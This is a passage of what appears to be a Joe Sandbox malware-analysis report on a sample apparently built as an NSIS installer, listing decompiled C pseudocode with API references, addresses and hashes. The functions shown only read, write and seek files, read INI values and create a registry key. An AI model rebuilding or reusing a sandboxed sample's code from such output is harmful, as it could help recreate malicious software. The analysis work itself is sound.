				if( *0x6ee85024 != 0 && E6EE81B3E(_a4) == 0) {
					 *0x6ee85030 = _t86;
					if( *0x6ee85034 != 0) {
						_t86 =  *0x6ee85034;
					} else {
						E6EE83100(E6EE81BA7());
						 *0x6ee85034 = _t86;
					}
				}
				_t28 = E6EE81BAD(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6EE81B38();
					_t67 = _a4;
					_t74 =  *0x6ee85028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6ee85028 = _t67;
					E6EE81BBE();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x6ee85000 = _t33;
					 *0x6ee85004 = _t74;
					if( *0x6ee85024 != 0 && E6EE81B3E( *0x6ee85028) == 0) {
						 *0x6ee85034 = _t87;
						_t87 =  *0x6ee85030;
					}
					_t75 =  *0x6ee85028;
					_a4 = _t75;
					 *0x6ee85028 =  *((intOrPtr*)(E6EE81B38() + _t75));
					_t37 = E6EE81B2A(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6EE81BAD(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6EE81BB8() + _a4 + _v8);
							_push(E6EE81BC8());
							if( *0x6ee85024 <= 0 || E6EE81B3E(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6ee85034;
								_t76 = _t64 + _t78 * 4;
								 *0x6ee85034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6ee85028 == 0) {
						 *0x6ee85034 = 0;
					}
					E6EE82B72(_t37, _t64, _t76, _a4,  *0x6ee85000,  *0x6ee85004);
					return _a4;
				}
				_push(E6EE81BB8() + _a4);
				_t53 = E6EE81BC4();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6EE81C27();
				_t80 = E6EE81C23();
				_t83 = E6EE81BC8();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                                                                                                            0x6ee82bd4
                                                                                                                                                                                            0x6ee82be5
                                                                                                                                                                                            0x6ee82bf2
                                                                                                                                                                                            0x6ee82c06
                                                                                                                                                                                            0x6ee82bf4
                                                                                                                                                                                            0x6ee82bf9
                                                                                                                                                                                            0x6ee82bfe
                                                                                                                                                                                            0x6ee82bfe
                                                                                                                                                                                            0x6ee82bf2
                                                                                                                                                                                            0x6ee82c0f
                                                                                                                                                                                            0x6ee82c14
                                                                                                                                                                                            0x6ee82c1a
                                                                                                                                                                                            0x6ee82c5e
                                                                                                                                                                                            0x6ee82c5e
                                                                                                                                                                                            0x6ee82c63
                                                                                                                                                                                            0x6ee82c68
                                                                                                                                                                                            0x6ee82c6e
                                                                                                                                                                                            0x6ee82c70
                                                                                                                                                                                            0x6ee82c76
                                                                                                                                                                                            0x6ee82c83
                                                                                                                                                                                            0x6ee82c85
                                                                                                                                                                                            0x6ee82c8a
                                                                                                                                                                                            0x6ee82c97
                                                                                                                                                                                            0x6ee82caa
                                                                                                                                                                                            0x6ee82cb0
                                                                                                                                                                                            0x6ee82cb6
                                                                                                                                                                                            0x6ee82cb7
                                                                                                                                                                                            0x6ee82cbd
                                                                                                                                                                                            0x6ee82cc9
                                                                                                                                                                                            0x6ee82ccf
                                                                                                                                                                                            0x6ee82cd7
                                                                                                                                                                                            0x6ee82cd8
                                                                                                                                                                                            0x6ee82cdb
                                                                                                                                                                                            0x6ee82ce6
                                                                                                                                                                                            0x6ee82ce8
                                                                                                                                                                                            0x6ee82cf4
                                                                                                                                                                                            0x6ee82cfa
                                                                                                                                                                                            0x6ee82d02
                                                                                                                                                                                            0x6ee82d2e
                                                                                                                                                                                            0x6ee82d2f
                                                                                                                                                                                            0x6ee82d35
                                                                                                                                                                                            0x6ee82d35
                                                                                                                                                                                            0x6ee82d38
                                                                                                                                                                                            0x6ee82d39
                                                                                                                                                                                            0x6ee82d3c
                                                                                                                                                                                            0x6ee82d12
                                                                                                                                                                                            0x6ee82d12
                                                                                                                                                                                            0x6ee82d13
                                                                                                                                                                                            0x6ee82d15
                                                                                                                                                                                            0x6ee82d18
                                                                                                                                                                                            0x6ee82d1e
                                                                                                                                                                                            0x6ee82d21
                                                                                                                                                                                            0x6ee82d27
                                                                                                                                                                                            0x6ee82d2a
                                                                                                                                                                                            0x6ee82d2a
                                                                                                                                                                                            0x6ee82d02
                                                                                                                                                                                            0x6ee82ce6
                                                                                                                                                                                            0x6ee82d45
                                                                                                                                                                                            0x6ee82d47
                                                                                                                                                                                            0x6ee82d47
                                                                                                                                                                                            0x6ee82d60
                                                                                                                                                                                            0x6ee82d6e
                                                                                                                                                                                            0x6ee82d6e
                                                                                                                                                                                            0x6ee82c25
                                                                                                                                                                                            0x6ee82c26
                                                                                                                                                                                            0x6ee82c2b
                                                                                                                                                                                            0x6ee82c2f
                                                                                                                                                                                            0x6ee82c34
                                                                                                                                                                                            0x6ee82c48
                                                                                                                                                                                            0x6ee82c49
                                                                                                                                                                                            0x6ee82c4a
                                                                                                                                                                                            0x6ee82c4c
                                                                                                                                                                                            0x6ee82c51
                                                                                                                                                                                            0x6ee82c53
                                                                                                                                                                                            0x6ee82c53
                                                                                                                                                                                            0x6ee82c56
                                                                                                                                                                                            0x6ee82c5c
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                            • Opcode ID: bbd1d6fa9a4549e7d6a63f278e8354919f6a236c1c457c0d952fb2032878467a
                                                                                                                                                                                            • Instruction ID: 810e9523065ea59b00be258d929e7aeb3ac591121ca1193f531c1e8a3aca0d44
                                                                                                                                                                                            • Opcode Fuzzy Hash: bbd1d6fa9a4549e7d6a63f278e8354919f6a236c1c457c0d952fb2032878467a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22418175901604DFDF009FE4DA54B9B3BB8EB1A368F304829E509CF264EB34D549CB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040288B Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                            			E0040288B(intOrPtr __ebx, void* __edi) {
				signed int _t26;
				void* _t37;
				void* _t39;

				 *((intOrPtr*)(_t37 + 0x1c)) = __ebx;
				_t39 = E00402E56(2) - 1;
				if(_t39 < 0) {
					_t26 =  *(_t37 + 0x10);
					goto L19;
				} else {
					__ecx = 0x3ff;
					 *(__esp + 0x10) = __eax;
					if( *__ebp == __bl) {
						L11:
						__ecx =  *(__esp + 0x18);
						__eax = 0;
						 *( *(__esp + 0x18) + __edi) = __bl;
						_t26 = 0 | _t39 == 0x00000000;
						L19:
						 *0x4240c8 =  *0x4240c8 + _t26;
					} else {
						_push(__ebp);
						 *(__esp + 0x18) = __bl;
						 *(__esp + 0x1c) = E00406A20(0x3ff);
						if( *(__esp + 0x10) > __ebx) {
							__ebp = __ebx;
							while(1) {
								__eax = E00406747(__esp + 0x27, __eax, __esp + 0x27, __esi); // executed
								if(__eax == 0) {
									goto L11;
								}
								if( *((intOrPtr*)(__esp + 0x34)) != __ebx) {
									 *(__esp + 0x23) & 0x000000ff = E00406408(__edi,  *(__esp + 0x23) & 0x000000ff);
								} else {
									__al =  *((intOrPtr*)(__esp + 0x14));
									if(__al == 0xd || __al == 0xa) {
										__cl =  *(__esp + 0x23);
										if(__al == __cl || __cl != 0xd && __cl != 0xa) {
											__eax = SetFilePointer( *(__esp + 0x28), 0xffffffff, __ebx, __esi);
										} else {
											 *((char*)(__edi + __ebp)) = __cl;
											 *(__esp + 0x18) = __ebp;
										}
										goto L11;
									} else {
										__al =  *(__esp + 0x23);
										 *((char*)(__edi + __ebp)) = __al;
										__ebp =  &(__ebp[0]);
										 *((char*)(__esp + 0x14)) = __al;
										 *(__esp + 0x18) = __ebp;
										if(__al == 0) {
											goto L11;
										} else {
											__eax =  *(__esp + 0x1c);
											if(__ebp <  *(__esp + 0x10)) {
												continue;
											} else {
												goto L11;
											}
										}
									}
								}
								goto L20;
							}
						}
						goto L11;
					}
				}
				L20:
				return 0;
			}






                                                                                                                                                                                            0x0040288d
                                                                                                                                                                                            0x0040289a
                                                                                                                                                                                            0x0040289c
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004028a2
                                                                                                                                                                                            0x004028a2
                                                                                                                                                                                            0x004028ac
                                                                                                                                                                                            0x004028b3
                                                                                                                                                                                            0x0040290b
                                                                                                                                                                                            0x0040290b
                                                                                                                                                                                            0x0040290f
                                                                                                                                                                                            0x00402913
                                                                                                                                                                                            0x004019de
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x004028b5
                                                                                                                                                                                            0x004028b5
                                                                                                                                                                                            0x004028b6
                                                                                                                                                                                            0x004028bf
                                                                                                                                                                                            0x004028c7
                                                                                                                                                                                            0x004028c9
                                                                                                                                                                                            0x004028cb
                                                                                                                                                                                            0x004028d2
                                                                                                                                                                                            0x004028d9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004028df
                                                                                                                                                                                            0x0040294e
                                                                                                                                                                                            0x004028e1
                                                                                                                                                                                            0x004028e1
                                                                                                                                                                                            0x004028e7
                                                                                                                                                                                            0x0040291b
                                                                                                                                                                                            0x00402921
                                                                                                                                                                                            0x0040293f
                                                                                                                                                                                            0x0040292d
                                                                                                                                                                                            0x0040292d
                                                                                                                                                                                            0x00402931
                                                                                                                                                                                            0x00402931
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004028ed
                                                                                                                                                                                            0x004028ed
                                                                                                                                                                                            0x004028f1
                                                                                                                                                                                            0x004028f4
                                                                                                                                                                                            0x004028f5
                                                                                                                                                                                            0x004028f9
                                                                                                                                                                                            0x004028ff
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402901
                                                                                                                                                                                            0x00402901
                                                                                                                                                                                            0x00402909
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402909
                                                                                                                                                                                            0x004028ff
                                                                                                                                                                                            0x004028e7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004028df
                                                                                                                                                                                            0x004028cb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004028c7
                                                                                                                                                                                            0x004028b3
                                                                                                                                                                                            0x00402d06
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,000000FF,?,00000001,00000000,?,00000001), ref: 0040293F
                                                                                                                                                                                              • Part of subcall function 00406747: ReadFile.KERNELBASE(?,00000000,00000000,?,00000000,004135D0,-00391F73,?,00000000,00402F3D,?,?,004030A1,004135D0,-00391F73), ref: 0040675E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$PointerRead
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3154509469-0
                                                                                                                                                                                            • Opcode ID: e1dd5e1fa3a5da7d3fb869960cd583036237758ecb37da1d56e770abca77d921
                                                                                                                                                                                            • Instruction ID: 6129cbce010b3b02e2f1bd71636ddffd9b3cd66ab47c67a8d836afb09dbace8f
                                                                                                                                                                                            • Opcode Fuzzy Hash: e1dd5e1fa3a5da7d3fb869960cd583036237758ecb37da1d56e770abca77d921
                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21E9B030C3998FC7219F25559456BBBD49F81708F50093FF4D1A62D1C278C94AC75A
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040257C Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E0040257C(char __ebx, void* _a4, char _a8, short _a20) {
				short _t5;
				CHAR* _t6;
				CHAR* _t7;
				long _t10;
				void* _t14;
				CHAR* _t19;
				void* _t21;

				_t5 = 0xa;
				_a20 = _t5;
				_t6 = E00402E92(_t14, "true");
				_t7 = E00402E92(_t14, 0x12);
				_t10 = GetPrivateProfileStringA(_t6, _t7,  &_a8, _t19, 0x3ff, E00402E92(_t14, 0xffffffdd)); // executed
				if( *_t19 != 0xa) {
					_t10 =  *(_t21 + 0x10);
				} else {
					 *_t19 = __ebx;
				}
				 *0x4240c8 =  *0x4240c8 + _t10;
				return 0;
			}










                                                                                                                                                                                            0x0040257e
                                                                                                                                                                                            0x00402581
                                                                                                                                                                                            0x00402586
                                                                                                                                                                                            0x0040258f
                                                                                                                                                                                            0x004025ab
                                                                                                                                                                                            0x004025b5
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x004025bb
                                                                                                                                                                                            0x0040189b
                                                                                                                                                                                            0x0040189b
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(00000000,00000000,?,?,000003FF,00000000), ref: 004025AB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: PrivateProfileString
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1096422788-0
                                                                                                                                                                                            • Opcode ID: 97350b9f85ad19eff141994d8a442186a00fc15ec4e814d8b8a578b9acccfa8f
                                                                                                                                                                                            • Instruction ID: 59559d5367fc2ce40ee613de4f7631c90518efd810d08961f4be64b77e4d60c5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 97350b9f85ad19eff141994d8a442186a00fc15ec4e814d8b8a578b9acccfa8f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 16F0E932644324ABE710DB60DC45E7B7398EB41320F10853BFE44E70D1D6B9D9044399
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402958 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                                                                            			E00402958(void* __ebx, intOrPtr* __ebp, intOrPtr _a16, intOrPtr _a40, intOrPtr _a52) {
				void* __edi;
				intOrPtr _t4;

				if( *__ebp != __ebx) {
					__eax = E00402E56(2);
					_push(_a52);
					__eax = E00406A20(__ecx);
					__eax = SetFilePointer(__eax, __ebp, __eax, __ebx); // executed
					if(_a40 >= __ebx) {
						_push(__eax);
						E00406408();
					}
				}
				_t4 = _a16;
				 *0x4240c8 =  *0x4240c8 + _t4;
				return 0;
			}





                                                                                                                                                                                            0x0040295b
                                                                                                                                                                                            0x00402963
                                                                                                                                                                                            0x00402969
                                                                                                                                                                                            0x00402970
                                                                                                                                                                                            0x00402976
                                                                                                                                                                                            0x00402980
                                                                                                                                                                                            0x00402986
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x00402980
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402976
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                            • Opcode ID: 77debf06c467ff0ba7b8de98d8e626fe392bb15b025d5c2aa70db3542c79ba45
                                                                                                                                                                                            • Instruction ID: 6ea2f6dff300550ce7c85fe602ffa9c68c3715a635ade8b8eb59eea6934afadf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 77debf06c467ff0ba7b8de98d8e626fe392bb15b025d5c2aa70db3542c79ba45
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FE0D872744245AFE340EB209D0597B775CFB80315F00483FF905A50C2D6794806572D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406747 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406747(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t7;
				long _t11;
				struct _OVERLAPPED* _t14;

				_t11 = _a12;
				_t14 = 0;
				_t7 = ReadFile(_a4, _a8, _t11,  &_v8, 0); // executed
				if(_t7 != 0 && _t11 == _v8) {
					_t14 = 1;
				}
				return _t14;
			}







                                                                                                                                                                                            0x0040674d
                                                                                                                                                                                            0x00406753
                                                                                                                                                                                            0x0040675e
                                                                                                                                                                                            0x00406766
                                                                                                                                                                                            0x0040676d
                                                                                                                                                                                            0x0040676d
                                                                                                                                                                                            0x00406773

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000,004135D0,-00391F73,?,00000000,00402F3D,?,?,004030A1,004135D0,-00391F73), ref: 0040675E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                            • Opcode ID: 2a662aafa23bd6e196a98a1ce9c0bec24bdd54229fa1bbf747cdec235b34823e
                                                                                                                                                                                            • Instruction ID: 5ebd29974ed0b4fc473b0f70eb66fc0501a72b305c0674e46fc459d203ba0a4f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a662aafa23bd6e196a98a1ce9c0bec24bdd54229fa1bbf747cdec235b34823e
                                                                                                                                                                                            • Instruction Fuzzy Hash: F3E0BF32204119BBCF205F56DD04D9FFF6DEE917A47124026B905A3150D670EA21D6F4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406806 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406806(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t7;
				long _t11;
				struct _OVERLAPPED* _t14;

				_t11 = _a12;
				_t14 = 0;
				_t7 = WriteFile(_a4, _a8, _t11,  &_v8, 0); // executed
				if(_t7 != 0 && _t11 == _v8) {
					_t14 = 1;
				}
				return _t14;
			}







                                                                                                                                                                                            0x0040680c
                                                                                                                                                                                            0x00406812
                                                                                                                                                                                            0x0040681d
                                                                                                                                                                                            0x00406825
                                                                                                                                                                                            0x0040682c
                                                                                                                                                                                            0x0040682c
                                                                                                                                                                                            0x00406832

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00419D6E,-00391F73,?,00000000,0040303B,004175D0,00419D6E,004135D0,-00391F73,?,00403106), ref: 0040681D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                            • Opcode ID: ca216c0d528c4680506d2ea24c70e12b03f25ea9cafb0f7f106dcfbd7b4d0bc1
                                                                                                                                                                                            • Instruction ID: c85223fe551ff0bb52bd13cf097f4d9bfbf834e3bfa08d31d37f76875fca0a1e
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca216c0d528c4680506d2ea24c70e12b03f25ea9cafb0f7f106dcfbd7b4d0bc1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE0BF72601119BB8F205F46DD04D9FBFADEE956A07114026F905A6150D670EA11D6E4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406117 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406117(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405FCC(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                            0x00406121
                                                                                                                                                                                            0x00406128
                                                                                                                                                                                            0x00406140
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406140
                                                                                                                                                                                            0x0040612c
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 00406140
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2289755597-0
